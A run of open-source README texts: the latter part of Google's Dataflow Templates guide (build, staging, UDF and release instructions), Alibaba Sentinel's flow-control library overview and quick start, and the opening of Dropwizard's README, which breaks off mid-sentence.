Bigtable](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20BigQuery_to_Bigtable&type=code) - [BigQuery to Datastore](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_BigQuery_to_Cloud_Datastore&type=code) - [BigQuery to Elasticsearch](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20BigQuery_to_Elasticsearch&type=code) - [BigQuery to MongoDB](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20BigQuery_to_MongoDB&type=code) - [BigQuery to TensorFlow Records](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_BigQuery_to_GCS_TensorFlow_Records&type=code) - [Cassandra to Cloud Bigtable](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cassandra_To_Cloud_Bigtable&type=code) - [Cloud Bigtable to Avro Files in Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Bigtable_to_GCS_Avro&type=code) - [Cloud Bigtable to Parquet Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Bigtable_to_GCS_Parquet&type=code) - [Cloud Bigtable to SequenceFile Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Bigtable_to_GCS_SequenceFile&type=code) - [Cloud Spanner to Avro Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Cloud_Spanner_to_GCS_Avro&type=code) - [Cloud Spanner to Text Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Spanner_to_GCS_Text&type=code) - [Cloud Storage To Splunk](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_To_Splunk&type=code) - [Cloud Storage to Elasticsearch](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_to_Elasticsearch&type=code) - [Dataplex JDBC Ingestion](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Dataplex_JDBC_Ingestion&type=code) - [Dataplex: Convert Cloud Storage File Format](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Dataplex_File_Format_Conversion&type=code) - [Dataplex: Tier Data from BigQuery to Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Dataplex_BigQuery_to_GCS&type=code) - [Firestore (Datastore mode) to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Firestore_to_BigQuery_Flex&type=code) - [Firestore (Datastore mode) to Text Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Firestore_to_GCS_Text&type=code) - [Google Ads to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Google_Ads_to_BigQuery&type=code) - [Google Cloud to Neo4j](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Google_Cloud_to_Neo4j&type=code) - [JDBC to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Jdbc_to_BigQuery&type=code) - [JDBC to BigQuery with BigQuery Storage API support](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Jdbc_to_BigQuery_Flex&type=code) - [JDBC to Pub/Sub](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Jdbc_to_PubSub&type=code) - [MongoDB to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20MongoDB_to_BigQuery&type=code) - [MySQL to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20MySQL_to_BigQuery&type=code) - [Parquet Files on Cloud Storage to Cloud Bigtable](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Parquet_to_Cloud_Bigtable&type=code) - [PostgreSQL to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20PostgreSQL_to_BigQuery&type=code) - [SQLServer to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20SQLServer_to_BigQuery&type=code) - [SequenceFile Files on Cloud Storage to Cloud Bigtable](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_SequenceFile_to_Cloud_Bigtable&type=code) - [Text Files on Cloud Storage to BigQuery](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Text_to_BigQuery&type=code) - [Text Files on Cloud Storage to BigQuery with BigQuery Storage API support](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Text_to_BigQuery_Flex&type=code) - [Text Files on Cloud Storage to Cloud Spanner](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Text_to_Cloud_Spanner&type=code) - [Text Files on Cloud Storage to Firestore (Datastore mode)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Text_to_Firestore&type=code) - Utilities - [Bulk Compress Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Bulk_Compress_GCS_Files&type=code) - [Bulk Decompress Files on Cloud Storage](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Bulk_Decompress_GCS_Files&type=code) - [Bulk Delete Entities in Firestore (Datastore mode)](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Firestore_to_Firestore_Delete&type=code) - [Convert file formats between Avro, Parquet & CSV](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20File_Format_Conversion&type=code) - [Streaming Data Generator](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Streaming_Data_Generator&type=code) - Legacy Templates - [Bulk Delete Entities in Datastore [Deprecated]](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Datastore_to_Datastore_Delete&type=code) - [Datastore to Text Files on Cloud Storage [Deprecated]](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20Datastore_to_GCS_Text&type=code) - [Text Files on Cloud Storage to Datastore [Deprecated]](https://github.com/search?q=repo%3AGoogleCloudPlatform%2FDataflowTemplates%20GCS_Text_to_Datastore&type=code) For documentation on each template's usage and parameters, please see the official [docs](https://cloud.google.com/dataflow/docs/templates/provided-templates). ## Getting Started ### Requirements * Java 11 * Maven 3 ### Building the Project Build the entire project using the maven compile command. ```sh mvn clean compile ``` ### Building/Testing from IntelliJ IntelliJ, by default, will often skip necessary Maven goals, leading to build failures. You can fix these in the Maven view by going to **Module_Name > Plugins > Plugin_Name** where Module_Name and Plugin_Name are the names of the respective module and plugin with the rule. From there, right-click the rule and select "Execute Before Build". The list of known rules that require this are: * common > Plugins > protobuf > protobuf:compile * common > Plugins > protobuf > protobuf:test-compile ### Formatting Code From either the root directory or v2/ directory, run: ```sh mvn spotless:apply ``` This will format the code and add a license header. To verify that the code is formatted correctly, run: ```sh mvn spotless:check ``` ### Executing a Template File Once the template is staged on Google Cloud Storage, it can then be executed using the gcloud CLI tool. Please check [Running classic templates](https://cloud.google.com/dataflow/docs/guides/templates/running-templates#using-gcloud) or [Using Flex Templates](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates#run-a-flex-template-pipeline) for more information. ## Developing/Contributing Templates ### Templates Plugin Templates plugin was created to make the workflow of creating, testing and releasing Templates easier. Before using the plugin, please make sure that the [gcloud CLI](https://cloud.google.com/sdk/docs/install) is installed and up-to-date, and that the client is properly authenticated using: ```shell gcloud init gcloud auth application-default login ``` After authenticated, install the plugin into your local repository: ```shell mvn clean install -pl plugins/templates-maven-plugin -am ``` ### Staging (Deploying) Templates To stage a Template, it is necessary to upload the images to Artifact Registry (for Flex templates) and copy the template to Cloud Storage. Although there are different steps that depend on the kind of template being developed. The plugin allows a template to be staged using the following single command: ```shell mvn clean package -PtemplatesStage \ -DskipTests \ -DprojectId="{projectId}" \ -DbucketName="{bucketName}" \ -DstagePrefix="images/$(date +%Y_%m_%d)_01" \ -DtemplateName="Cloud_PubSub_to_GCS_Text_Flex" \ -pl v2/googlecloud-to-googlecloud -am ``` Notes: - Change `-pl v2/googlecloud-to-googlecloud` and `-DtemplateName` to point to the specific Maven module where your template is located. Even though `-pl` is not required, it allows the command to run considerably faster. - In case `-DtemplateName` is not specified, all templates for the module will be staged. ### Generating Template's Terraform module This repository can generate a [terraform module](https://developer.hashicorp.com/terraform/language/modules) that prompts users for template specific parameters and launch a Dataflow Job. To generate a template specific terraform module, see the instructions for classic and flex templates below. #### Plugin artifact dependencies The required plugin artifact dependencies are listed below: - [plugins/core-plugin/src/main/resources/terraform-classic-template.tf](plugins/core-plugin/src/main/resources/terraform-classic-template.tf) - [plugins/core-plugin/src/main/resources/terraform-classic-template.tf](plugins/core-plugin/src/main/resources/terraform-classic-template.tf) These are outputs from the [cicd/cmd/run-terraform-schema](cicd/cmd/run-terraform-schema). See [cicd/cmd/run-terraform-schema/README.md](cicd/cmd/run-terraform-schema/README.md) for further details. #### For Classic templates: ```shell mvn clean prepare-package \ -DskipTests \ -PtemplatesTerraform \ -pl v1 -am ``` Next, [terraform fmt](https://developer.hashicorp.com/terraform/cli/commands/fmt) the modules after generating: ```shell terraform fmt -recursive v1 ``` The resulting terraform modules are generated in [v1/terraform](v1/terraform). #### For Flex templates: ```shell mvn clean prepare-package \ -DskipTests \ -PtemplatesTerraform \ -pl v2/googlecloud-togooglecloud -am ``` Next, [terraform fmt](https://developer.hashicorp.com/terraform/cli/commands/fmt) the modules after generating: ```shell terraform fmt -recursive v2 ``` The resulting terraform modules are generated in `v2/<source>-to-<sink>/terraform`, for example [v2/bigquery-to-bigtable/terraform](v2/bigquery-to-bigtable/terraform). Notes: - Change `-pl v2/googlecloud-to-googlecloud` and `-DtemplateName` to point to the specific Maven module where your template is located. ### Running a Template A template can also be executed on Dataflow, directly from the command line. The command-line is similar to staging a template, but it is required to specify `-Dparameters` with the parameters that will be used when launching the template. For example: ```shell mvn clean package -PtemplatesRun \ -DskipTests \ -DprojectId="{projectId}" \ -DbucketName="{bucketName}" \ -Dregion="us-central1" \ -DtemplateName="Cloud_PubSub_to_GCS_Text_Flex" \ -Dparameters="inputTopic=projects/{projectId}/topics/{topicName},windowDuration=15s,outputDirectory=gs://{outputDirectory}/out,outputFilenamePrefix=output-,outputFilenameSuffix=.txt" \ -pl v2/googlecloud-to-googlecloud -am ``` Notes: - When running a template, `-DtemplateName` is mandatory, as `-Dparameters=` are different across templates. - `-PtemplatesRun` is self-contained, i.e., it is not required to run ** Deploying/Staging Templates** before. In case you want to run a previously staged template, the existing path can be provided as `-DspecPath=gs://.../path` - `-DjobName="{name}"` may be informed if a specific name is desirable ( optional). - If you encounter the error `Template run failed: File too large`, try adding `-DskipShade` to the mvn args. ### Running Integration Tests To run integration tests, the developer plugin can be also used to stage template on-demand (in case the parameter `-DspecPath=` is not specified). For example, to run all the integration tests in a specific module (in the example below, `v2/googlecloud-to-googlecloud`): ```shell mvn clean verify \ -PtemplatesIntegrationTests \ -Dproject="{project}" \ -DartifactBucket="{bucketName}" \ -Dregion=us-central1 \ -pl v2/googlecloud-to-googlecloud -am ``` The parameter `-Dtest=` can be given to test a single class (e.g., `-Dtest=PubsubToTextIT`) or single test case (e.g., `-Dtest=PubsubToTextIT#testTopicToGcs`). The same happens when the test is executed from an IDE, just make sure to add the parameters `-Dproject=`, `-DartifactBucket=` and `-Dregion=` as program or VM arguments. ## Metadata Annotations A template requires more information than just a name and description. For example, in order to be used from the Dataflow UI, parameters need a longer help text to guide users, as well as proper types and validations to make sure parameters are being passed correctly. We introduced annotations to have the source code as a single source of truth, along with a set of utilities / plugins to generate template-accompanying artifacts (such as command specs, parameter specs). #### @Template Annotation Every template must be annotated with `@Template`. Existing templates can be used for reference, but the structure is as follows: ```java @Template( name = "BigQuery_to_Elasticsearch", category = TemplateCategory.BATCH, displayName = "BigQuery to Elasticsearch", description = "A pipeline which sends BigQuery records into an Elasticsearch instance as JSON documents.", optionsClass = BigQueryToElasticsearchOptions.class, flexContainerName = "bigquery-to-elasticsearch") public class BigQueryToElasticsearch { ``` #### @TemplateParameter Annotation A set of `@TemplateParameter.{Type}` annotations were created to allow the definition of options for a template, and the proper rendering in the UI, and validations by the template launch service. Examples can be found in the repository, but the general structure is as follows: ```java @TemplateParameter.Text( order = 2, optional = false, regexes = {"[,a-zA-Z0-9._-]+"}, description = "Kafka topic(s) to read the input from", helpText = "Kafka topic(s) to read the input from.", example = "topic1,topic2") @Validation.Required String getInputTopics(); ``` ```java @TemplateParameter.GcsReadFile( order = 1, description = "Cloud Storage Input File(s)", helpText = "Path of the file pattern glob to read from.", example = "gs://your-bucket/path/*.csv") String getInputFilePattern(); ``` ```java @TemplateParameter.Boolean( order = 11, optional = true, description = "Whether to use column alias to map the rows.", helpText = "If enabled (set to true) the pipeline will consider column alias (\"AS\") instead of the column name to map the rows to BigQuery.") @Default.Boolean(false) Boolean getUseColumnAlias(); ``` ```java @TemplateParameter.Enum( order = 21, enumOptions = {"INDEX", "CREATE"}, optional = true, description = "Build insert method", helpText = "Whether to use INDEX (index, allows upsert) or CREATE (create, errors on duplicate _id) with Elasticsearch bulk requests.") @Default.Enum("CREATE") BulkInsertMethodOptions getBulkInsertMethod(); ``` Note: `order` is relevant for templates that can be used from the UI, and specify the relative order of parameters. #### @TemplateIntegrationTest Annotation This annotation should be used by classes that are used for integration tests of other templates. This is used to wire a specific `IT` class with a template, and allows environment preparation / proper template staging before tests are executed on Dataflow. Template tests have to follow this general format (please note the `@TemplateIntegrationTest` annotation and the `TemplateTestBase` super-class): ```java @TemplateIntegrationTest(PubsubToText.class) @RunWith(JUnit4.class) public final class PubsubToTextIT extends TemplateTestBase { ``` Please refer to `Templates Plugin` to use and validate such annotations. ## Using UDFs User-defined functions (UDFs) allow you to customize a template's functionality by providing a short JavaScript function without having to maintain the entire codebase. This is useful in situations which you'd like to rename fields, filter values, or even transform data formats before output to the destination. All UDFs are executed by providing the payload of the element as a string to the JavaScript function. You can then use JavaScript's in-built JSON parser or other system functions to transform the data prior to the pipeline's output. The return statement of a UDF specifies the payload to pass forward in the pipeline. This should always return a string value. If no value is returned or the function returns undefined, the incoming record will be filtered from the output. ### UDF Function Specification | Template | UDF Input Type | Input Description | UDF Output Type | Output Description | |-----------------------|----------------|-------------------------------------------------|-----------------|--------------------------------------------------------------------------------------------------------| | Datastore Bulk Delete | String | A JSON string of the entity | String | A JSON string of the entity to delete; filter entities by returning undefined | | Datastore to Pub/Sub | String | A JSON string of the entity | String | The payload to publish to Pub/Sub | | Datastore to GCS Text | String | A JSON string of the entity | String | A single-line within the output file | | GCS Text to BigQuery | String | A single-line within the input file | String | A JSON string which matches the destination table's schema | | Pub/Sub to BigQuery | String | A string representation of the incoming payload | String | A JSON string which matches the destination table's schema | | Pub/Sub to Datastore | String | A string representation of the incoming payload | String | A JSON string of the entity to write to Datastore | | Pub/Sub to Splunk | String | A string representation of the incoming payload | String | The event data to be sent to Splunk HEC events endpoint. Must be a string or a stringified JSON object | ### UDF Examples For a comprehensive list of samples, please check our [udf-samples](v2/common/src/main/resources/udf-samples) folder. #### Adding fields ```js /** * A transform which adds a field to the incoming data. * @param {string} inJson * @return {string} outJson */ function transform(inJson) { var obj = JSON.parse(inJson); obj.dataFeed = "Real-time Transactions"; obj.dataSource = "POS"; return JSON.stringify(obj); } ``` #### Filtering records ```js /** * A transform function which only accepts 42 as the answer to life. * @param {string} inJson * @return {string} outJson */ function transform(inJson) { var obj = JSON.parse(inJson); // only output objects which have an answer to life of 42. if (obj.hasOwnProperty('answerToLife') && obj.answerToLife === 42) { return JSON.stringify(obj); } } ``` ## Generated Documentation This repository contains generated documentation, which contains a list of parameters and instructions on how to customize and/or build every template. To generate the documentation for all templates, the following command can be used: ```shell mvn clean prepare-package \ -DskipTests \ -PtemplatesSpec ``` ## Release Process Templates are released in a weekly basis (best-effort) as part of the efforts to keep [Google-provided Templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates) updated with latest fixes and improvements. In case desired, you can stage and use your own changes using the `Staging (Deploying) Templates` steps. To execute the release of multiple templates, we provide a single Maven command to release Templates, which is a shortcut to stage all templates while running additional validations. ```shell mvn clean verify -PtemplatesRelease \ -DprojectId="{projectId}" \ -DbucketName="{bucketName}" \ -DlibrariesBucketName="{bucketName}-libraries" \ -DstagePrefix="$(date +%Y_%m_%d)-00_RC00" ``` ## Maven artifacts As part of the Templates development process, we release the common artifact snapshots to Maven Central, not modules that contain finalized templates. This allows users to consume those resources and modules without forking the entire project, while keeping artifacts at a reasonable size. In order to release artifacts, `~/.m2/settings.xml` should be configured to contain Sonatype's username and password: ```xml <servers> <server> <id>ossrh</id> <username>(user)</username> <password>(password)</password> </server> </servers> ``` And the command to release (for example, the development plugin and Spanner together): ```shell mvn clean deploy -am -Prelease \ -pl plugins/templates-maven-plugin \ -pl v2/spanner-common ``` If you intend to use those resources in an external project, your `pom.xml` should include: ```xml <repositories> <repository> <id>ossrh</id> <url>https://oss.sonatype.org/content/repositories/snapshots</url> </repository> </repositories> ``` ```xml <pluginRepositories> <pluginRepository> <id>ossrh</id> <url>https://oss.sonatype.org/content/repositories/snapshots</url> </pluginRepository> </pluginRepositories> ``` ## More Information * [Dataflow Templates](https://cloud.google.com/dataflow/docs/concepts/dataflow-templates) - basic template concepts. * [Google-provided Templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates) - official documentation for templates provided by Google (the source code is in this repository). * Dataflow Cookbook: [Blog](https://cloud.google.com/blog/products/data-analytics/introducing-dataflow-cookbook), [GitHub Repository](https://github.com/GoogleCloudPlatform/dataflow-cookbook) - pipeline examples and practical solutions to common data processing challenges. * [Dataflow Metrics Collector](https://github.com/GoogleCloudPlatform/dataflow-metrics-exporter) - CLI tool to collect dataflow resource & execution metrics and export to either BigQuery or Google Cloud Storage. Useful for comparison and visualization of the metrics while benchmarking the dataflow pipelines using various data formats, resource configurations etc * [Apache Beam](https://beam.apache.org) - [Overview](https://beam.apache.org/use/beam-overview/) - Quickstart: [Java](https://beam.apache.org/get-started/quickstart-java), [Python](https://beam.apache.org/get-started/quickstart-py), [Go](https://beam.apache.org/get-started/quickstart-go) - [Tour of Beam](https://tour.beam.apache.org/) - an interactive tour with learning topics covering core Beam concepts from simple ones to more advanced ones. - [Beam Playground](https://beam.apache.org/get-started/try-beam-playground/) - an interactive environment to try out Beam transforms and examples without having to install Apache Beam. - [Beam College](https://beamcollege.dev/) - hands-on training and practical tips, including video recordings of Apache Beam and Dataflow Templates lessons. - [Getting Started with Apache Beam - Quest](https://www.cloudskillsboost.google/quests/310) - A 5 lab series that provides a Google Cloud certified badge upon completion.
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# Sentinel: The Sentinel of Your Microservices <img src="https://user-images.githubusercontent.com/9434884/43697219-3cb4ef3a-9975-11e8-9a9c-73f4f537442d.png" alt="Sentinel Logo" width="50%"> [![Sentinel CI](https://github.com/alibaba/Sentinel/actions/workflows/ci.yml/badge.svg)](https://github.com/alibaba/Sentinel/actions/workflows/ci.yml) [![Codecov](https://codecov.io/gh/alibaba/Sentinel/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/Sentinel) [![Maven Central](https://img.shields.io/maven-central/v/com.alibaba.csp/sentinel-core.svg?label=Maven%20Central)](https://search.maven.org/search?q=g:com.alibaba.csp%20AND%20a:sentinel-core) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) [![Gitter](https://badges.gitter.im/alibaba/Sentinel.svg)](https://gitter.im/alibaba/Sentinel) [![Leaderboard](https://img.shields.io/badge/Sentinel-Check%20Your%20Contribution-orange)](https://opensource.alibaba.com/contribution_leaderboard/details?projectValue=sentinel) ## Introduction As distributed systems become increasingly popular, the reliability between services is becoming more important than ever before. Sentinel takes "flow" as breakthrough point, and works on multiple fields including **flow control**, **traffic shaping**, **concurrency limiting**, **circuit breaking** and **system adaptive overload protection**, to guarantee reliability and resilience for microservices. Sentinel has the following features: - **Rich applicable scenarios**: Sentinel has been wildly used in Alibaba, and has covered almost all the core-scenarios in Double-11 (11.11) Shopping Festivals in the past 10 years, such as “Second Kill” which needs to limit burst flow traffic to meet the system capacity, message peak clipping and valley fills, circuit breaking for unreliable downstream services, cluster flow control, etc. - **Real-time monitoring**: Sentinel also provides real-time monitoring ability. You can see the runtime information of a single machine in real-time, and the aggregated runtime info of a cluster with less than 500 nodes. - **Widespread open-source ecosystem**: Sentinel provides out-of-box integrations with commonly-used frameworks and libraries such as Spring Cloud, gRPC, Apache Dubbo and Quarkus. You can easily use Sentinel by simply add the adapter dependency to your services. - **Polyglot support**: Sentinel has provided native support for Java, [Go](https://github.com/alibaba/sentinel-golang), [C++](https://github.com/alibaba/sentinel-cpp) and [Rust](https://github.com/sentinel-group/sentinel-rust). - **Various SPI extensions**: Sentinel provides easy-to-use SPI extension interfaces that allow you to quickly customize your logic, for example, custom rule management, adapting data sources, and so on. Features overview: ![features-of-sentinel](./doc/image/sentinel-features-overview-en.png) The community is also working on **the specification of traffic governance and fault-tolerance**. Please refer to [OpenSergo](https://opensergo.io/) for details. ## Documentation See the [Sentinel Website](https://sentinelguard.io/) for the official website of Sentinel. See the [中文文档](https://sentinelguard.io/zh-cn/docs/introduction.html) for document in Chinese. See the [Wiki](https://github.com/alibaba/Sentinel/wiki) for full documentation, examples, blog posts, operational details and other information. Sentinel provides integration modules for various open-source frameworks (e.g. Spring Cloud, Apache Dubbo, gRPC, Quarkus, Spring WebFlux, Reactor) and service mesh. You can refer to [the document](https://sentinelguard.io/en-us/docs/open-source-framework-integrations.html) for more information. If you are using Sentinel, please [**leave a comment here**](https://github.com/alibaba/Sentinel/issues/18) to tell us your scenario to make Sentinel better. It's also encouraged to add the link of your blog post, tutorial, demo or customized components to [**Awesome Sentinel**](./doc/awesome-sentinel.md). ## Ecosystem Landscape ![ecosystem-landscape](./doc/image/sentinel-opensource-eco-landscape-en.png) ## Quick Start Below is a simple demo that guides new users to use Sentinel in just 3 steps. It also shows how to monitor this demo using the dashboard. ### 1. Add Dependency **Note:** Sentinel requires JDK 1.8 or later. If you're using Maven, just add the following dependency in `pom.xml`. ```xml <!-- replace here with the latest version --> <dependency> <groupId>com.alibaba.csp</groupId> <artifactId>sentinel-core</artifactId> <version>1.8.7</version> </dependency> ``` If not, you can download JAR in [Maven Center Repository](https://mvnrepository.com/artifact/com.alibaba.csp/sentinel-core). ### 2. Define Resource Wrap your code snippet via Sentinel API: `SphU.entry(resourceName)`. In below example, it is `System.out.println("hello world");`: ```java try (Entry entry = SphU.entry("HelloWorld")) { // Your business logic here. System.out.println("hello world"); } catch (BlockException e) { // Handle rejected request. e.printStackTrace(); } // try-with-resources auto exit ``` So far the code modification is done. We've also provided [annotation support module](https://github.com/alibaba/Sentinel/blob/master/sentinel-extension/sentinel-annotation-aspectj/README.md) to define resource easier. ### 3. Define Rules If we want to limit the access times of the resource, we can **set rules to the resource**. The following code defines a rule that limits access to the resource to 20 times per second at the maximum. ```java List<FlowRule> rules = new ArrayList<>(); FlowRule rule = new FlowRule(); rule.setResource("HelloWorld"); // set limit qps to 20 rule.setCount(20); rule.setGrade(RuleConstant.FLOW_GRADE_QPS); rules.add(rule); FlowRuleManager.loadRules(rules); ``` For more information, please refer to [How To Use](https://sentinelguard.io/en-us/docs/basic-api-resource-rule.html). ### 4. Check the Result After running the demo for a while, you can see the following records in `~/logs/csp/${appName}-metrics.log.{date}` (When using the default `DateFileLogHandler`). ```plaintext |--timestamp-|------date time----|-resource-|p |block|s |e|rt |occupied 1529998904000|2018-06-26 15:41:44|HelloWorld|20|0 |20|0|0 |0 1529998905000|2018-06-26 15:41:45|HelloWorld|20|5579 |20|0|728 |0 1529998906000|2018-06-26 15:41:46|HelloWorld|20|15698|20|0|0 |0 1529998907000|2018-06-26 15:41:47|HelloWorld|20|19262|20|0|0 |0 1529998908000|2018-06-26 15:41:48|HelloWorld|20|19502|20|0|0 |0 1529998909000|2018-06-26 15:41:49|HelloWorld|20|18386|20|0|0 |0 p stands for incoming request, block for blocked by rules, s for success handled by Sentinel, e for exception count, rt for average response time (ms), occupied stands for occupiedPassQps since 1.5.0 which enable us booking more than 1 shot when entering. ``` This shows that the demo can print "hello world" 20 times per second. More examples and information can be found in the [How To Use](https://sentinelguard.io/en-us/docs/basic-api-resource-rule.html) section. The working principles of Sentinel can be found in [How it works](https://sentinelguard.io/en-us/docs/basic-implementation.html) section. Samples can be found in the [sentinel-demo](https://github.com/alibaba/Sentinel/tree/master/sentinel-demo) module. ### 5. Start Dashboard > Note: Java 8 is required for building or running the dashboard. Sentinel also provides a simple dashboard application, on which you can monitor the clients and configure the rules in real time. ![dashboard](https://user-images.githubusercontent.com/9434884/55449295-84866d80-55fd-11e9-94e5-d3441f4a2b63.png) For details please refer to [Dashboard](https://github.com/alibaba/Sentinel/wiki/Dashboard). ## Trouble Shooting and Logs Sentinel will generate logs for troubleshooting and real-time monitoring. All the information can be found in [logs](https://sentinelguard.io/en-us/docs/logs.html). ## Bugs and Feedback For bug report, questions and discussions please submit [GitHub Issues](https://github.com/alibaba/sentinel/issues). Contact us via [Gitter](https://gitter.im/alibaba/Sentinel) or [Email](mailto:sentinel@linux.alibaba.com). ## Contributing Contributions are always welcomed! Please refer to [CONTRIBUTING](./CONTRIBUTING.md) for detailed guidelines. You can start with the issues labeled with [`good first issue`](https://github.com/alibaba/Sentinel/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22). ## Enterprise Service If you need Sentinel enterprise service support (Sentinel 企业版), or purchase cloud product services, you can join the discussion by the DingTalk group (34754806). It can also be directly activated and used through the [microservice engine (MSE 微服务引擎) provided by Alibaba Cloud](https://cn.aliyun.com/product/aliware/mse?spm=sentinel-github.index.0.0.0). ## Credits Thanks [Guava](https://github.com/google/guava), which provides some inspiration on rate limiting. And thanks for all [contributors](https://github.com/alibaba/Sentinel/graphs/contributors) of Sentinel! ## Who is using These are only part of the companies using Sentinel, for reference only. If you are using Sentinel, please [add your company here](https://github.com/alibaba/Sentinel/issues/18) to tell us your scenario to make Sentinel better :) ![Alibaba Group](https://docs.alibabagroup.com/assets2/images/en/global/logo_header.png) ![AntFin](https://user-images.githubusercontent.com/9434884/90598732-30961c00-e226-11ea-8c86-0b1d7f7875c7.png) ![Taiping Renshou](http://www.cntaiping.com/tplresource/cms/www/taiping/img/home_new/tp_logo_img.png) ![拼多多](http://cdn.pinduoduo.com/assets/img/pdd_logo_v3.png) ![爱奇艺](https://user-images.githubusercontent.com/9434884/90598445-a51c8b00-e225-11ea-9327-3543525f3f2a.png) ![Shunfeng Technology](https://user-images.githubusercontent.com/9434884/48463502-2f48eb80-e817-11e8-984f-2f9b1b789e2d.png) ![二维火](https://user-images.githubusercontent.com/9434884/49358468-bc43de00-f70d-11e8-97fe-0bf05865f29f.png) ![Mandao](https://user-images.githubusercontent.com/9434884/48463559-6cad7900-e817-11e8-87e4-42952b074837.png) ![文轩在线](http://static.winxuancdn.com/css/v2/images/logo.png) ![客如云](https://www.keruyun.com/static/krynew/images/logo.png) ![亲宝宝](https://stlib.qbb6.com/wclt/img/home_hd/version1/title_logo.png) ![金汇金融](https://res.jinhui365.com/r/images/logo2.png?v=1.527) ![闪电购](http://cdn.52shangou.com/shandianbang/official-source/3.1.1/build/images/logo.png)
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Dropwizard ========== [![Build](https://github.com/dropwizard/dropwizard/workflows/Java%20CI/badge.svg)](https://github.com/dropwizard/dropwizard/actions?query=workflow%3A%22Java+CI%22) [![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=dropwizard_dropwizard&metric=alert_status)](https://sonarcloud.io/dashboard?id=dropwizard_dropwizard) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.dropwizard/dropwizard-core/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.dropwizard/dropwizard-core/) [![Javadocs](https://javadoc.io/badge/io.dropwizard/dropwizard-project.svg?color=brightgreen)](https://javadoc.io/doc/io.dropwizard/dropwizard-project) [![Documentation Status](https://readthedocs.org/projects/dropwizard/badge/?version=stable)](https://www.dropwizard.io/en/stable/?badge=stable) [![Maintainability](https://api.codeclimate.com/v1/badges/11a16ea08c8b5499e2b9/maintainability)](https://codeclimate.com/github/dropwizard/dropwizard/maintainability) [![Reproducible Builds](https://img.shields.io/badge/Reproducible_Builds-ok-green?labelColor=blue)](https://github.com/jvm-repo-rebuild/reproducible-central#io.dropwizard:dropwizard-core) [![Contribute with Gitpod](https://img.shields.io/badge/Contribute%20with-Gitpod-908a85?logo=gitpod)](https://gitpod.io/#https://github.com/dropwizard/dropwizard) *Dropwizard is a sneaky way of making fast Java web applications.* It's a little bit of opinionated glue code which bangs together a set of libraries which have historically not sucked: * [Jetty](http://www.eclipse.org/jetty/) for HTTP servin'. * [Jersey](https://jersey.github.io/) for REST modelin'. * [Jackson](https://github.com/FasterXML/jackson) for JSON parsin' and generatin'. * [Logback](http://logback.qos.ch/) for loggin'. * [Hibernate Validator](http://hibernate.org/validator/) for validatin'. * [Metrics](http://metrics.dropwizard.io) for figurin' out what your application is doin' in production. * [JDBI](http://www.jdbi.org) and [Hibernate](http://www.hibernate.org/orm/) for databasin'. * [Liquibase](http://www.liquibase.org/) for migratin'. Read more at [dropwizard.io](http://www.dropwizard.io). Want to contribute to Dropwizard? --- Before working on the code, if you plan to contribute changes, 